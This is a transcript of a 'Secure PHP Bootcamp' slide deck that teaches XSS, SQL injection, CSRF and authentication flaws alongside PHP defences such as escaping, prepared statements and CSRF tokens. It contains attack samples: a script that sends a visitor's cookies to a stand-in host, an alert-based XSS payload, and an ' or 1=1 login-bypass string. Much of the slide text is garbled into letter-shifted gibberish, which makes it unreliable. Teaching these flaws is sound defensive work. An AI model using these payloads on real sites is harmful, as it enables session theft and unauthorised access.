Secure PHP Bootcamp

Transcript

1. Secure PHP Development $ISJT
   $PSOVUU
   
   !FOZHNB

2. https://jetbrains.com

3. Goals #BTJD
   BQQTFD
   QSJODJQMFT
   7VMOFSBCJMJUJFT
   
   &YQMPJUT
   )BOETPO
   FYQFSJFODF
   5PPMT5FDIOJRVFT

4. 1)1
   %FW
   
   :FBST
   "QQTFD
   GPDVTFE
   IUUQXFCTFDJP
   IUUQTFDVSJOHQIQDPN

5. IUUQCJUMZPXBTQUPQ

6. 5IFSF`T
   
   OP
   TVDI
   UIJOH
   
   BT
   
   TFDVSF

7. IUUQTHJUIVCDPNQTFDJPOPUDI /PUDI
   "
   7VMOFSBCMF
   "QQMJDBUJPO

8. IUUQTHJUIVCDPNQTFDJPOPUDI 4FUVQ
   5JNF PS
   IUUQOPUDITFDVSJOHQIQDPN

9. None

10. XSS: Cross Site Scripting

11. *OKFDUJPO
    PG
    DPOUFOU
    JOUP
    UIF
    QBHF
    VTVBMMZ
    +BWBTDSJQU
    SFqFDUFE
    WT
    TUPSFE
    QPPS
    PVUQVU
    FTDBQJOH

12. Example <?php echo “Howdy, my name is “.$_GET[‘name’]; ?> ?name=<script>alert(“xss”)</script>

13. Example <script> xmlhttp = new XMLHttpRequest(); xmlhttp.open( 'GET', ‘http://leethack.php?cookies=‘+document.cookie, true);

    xmlhttp.send(); </script> "TTVNFT
    DSPTTPSJHJO
    QPMJDZ
    PG
    

14. Prevention #1 <?php $name = htmlspecialchars( $_GET[‘name’], ENT_COMPAT, ‘UTF-8’ );

    echo “Howdy, my name is “.$name; ?> /PUF
    5IJT
    JT
    POMZ
    GPS
    B
    )5.-
    DPOUFYU

15. Prevention #2 {{ name|e(‘html’) }} {{ name|e(‘html_attr’) }} {{ name|e(‘js’)

    }} {{ name|e(‘css’) }} /PUF
    5IJT
    FYBNQMF
    SFRVJSFT
    5XJH

16. SQLi: SQL Injection

17. *OKFDUJPO
    TQFDJpD
    UP
    42-
    TUBUFNFOUT
    FYQPTF
    EBUB
    CZQBTT
    BVUI
    NFDIBOJTNT
    QPPS
    JOQVU
    pMUFSJOH

18. Example $sql = ‘select id from users where username =

    “‘.$_POST[‘username’].’” and password = “‘.$_POST[‘password’].’”’; password=‘ or 1=1; # select id from users where username = “user1” and password = “” or 1=1; #

19. BEE@TMBTIFT
    NZTRM@SFBM@FTDBQF@TUSJOH
    NZTRMJ@SFBM@FTDBQF@TUSJOH

20. BEE@TMBTIFT
    NZTRM@SFBM@FTDBQF@TUSJOH
    NZTRMJ@SFBM@FTDBQF@TUSJOH X

21. Prevention <?php $stmt = $dbh->prepare(‘select id from users’ .’ where

    username = :user’ .’ and password = :pass’); $stmt->execute(array( ‘user’ => $_POST[‘username’], ‘pass’ => $_POST[‘password’] )); $results = $stmt->fetchAll(PDO::FETCH_ASSOC); ?> /PUF
    5IJT
    FYBNQMF
    SFRVJSFT
    1%0
    TVQQPSU

22. CSRF: Cross Site Request Forgery

23. VOWBMJEBUFE
    GPSN
    TVCNJTTJPO
    PO
    BMM
    TUBUF
    DIBOHFT
    XIBU`T
    UIF
    TPVSDF
    TJNQMF
    SBOEPNJ[FE
    GPS
    FBDI
    GPSN

24. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> </form>

25. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> <input type=“hidden” value=“098f6bcd4621d373cade4e832627b4f6” name=“csrf-token”/> </form>

26. Auth*: Authentication & Authorization

27. EJSFDU
    PCKFDU
    SFGFSFODF
    "
    EBUB
    BDDFTT
    EBOHFSPVT
    BDUJPOT
    QPPS
    VTFS
    NBOBHFNFOU

28. QMBJOUFYU
    QBTTXPSET
    OP
    QBTTXPSE
    QPMJDZ
    PWFSMZ
    DPNQMFY
    QBTTXPSET
    QBTTXPSE
    IJOUT

29. None
30. None

31. And…

32. 4FDVSJUZ
    .JTDPOpHVSBUJPO
    4FOTJUJWF
    %BUB
    &YQPTVSF
    $PNQPOFOUT
    XJUI
    ,OPXO
    7VMOFSBCJMJUJFT
    6OWBMJEBUFE
    3FEJSFDUT
    BOE
    'PSXBSET

33. 5IBU`T
    BMM
    GPMLT
    !FOZHNB
    !TFDVSJOHQIQ
    IUUQTFDVSJOHQIQDPN